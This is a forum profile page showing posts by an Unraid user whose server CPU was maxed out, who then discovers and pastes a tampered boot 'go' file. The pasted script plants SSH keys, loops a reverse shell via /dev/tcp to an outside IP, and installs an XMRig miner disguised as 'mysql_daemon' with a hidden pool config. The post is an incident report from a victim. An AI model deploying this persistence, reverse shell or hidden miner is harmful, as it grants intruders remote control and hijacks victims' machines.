JackDewhurst
-
Posts
5 -
Joined
-
Last visited
Content Type
Profiles
Forums
Downloads
Store
Gallery
Bug Reports
Documentation
Landing
Posts posted by JackDewhurst
-
-
On 2/5/2021 at 3:03 PM, trurl said:
And the few plugins you have I don't think use that so I don't know why it would still be running.
Just a follow up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! full file contents below:
#!/bin/bash # Start the Management Utility /usr/local/sbin/emhttp & mkdir /root/.ssh chmod 700 /root/.ssh cp /boot/config/ssh/authorized_keys /root/.ssh/ chmod 600 /root/.ssh/authorized_keys nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6> cd /dev/shm wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li> tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz cd xmrig-6.7.0/ mv xmrig /usr/bin/mysql_daemon mkdir -p /etc/mysql/conf.d echo '{ "autosave": true, "background": true, "cpu": { "enabled": true, "max-threads-hint": 50 }, "max-cpu-usage": 25, "cpu-priority": 1, "opencl": false, "cuda": false, "pools": [ { "url": "pool.minexmr.com:443", "user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB> "keepalive": true, "tls": true } ] }' > /etc/mysql/conf.d/.config.json /usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B rm -r /dev/shm/xmrig-6.7.0 rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz
Not sure how they got access to be able to do this but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc..
-
I can kill it with kill -9 pid and it doesn't seem to have any detrimental effect on the system. Will just do this for the time being till I work out what the cause is.
-
-
Hi all,
Recently my server has been maxing out the cpu on all cores on boot. I've tried stopping all docker apps and arrays but the issue persists.
Running >top in terminal shows the process is mysql_daemon. Can I shut this process down or is it needed by the OS for something?
100% CPU across all cores due to mysql_daemon - UPDATE: go file hacked to mine Crypto
in General Support
Posted · Edited by JackDewhurst
I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr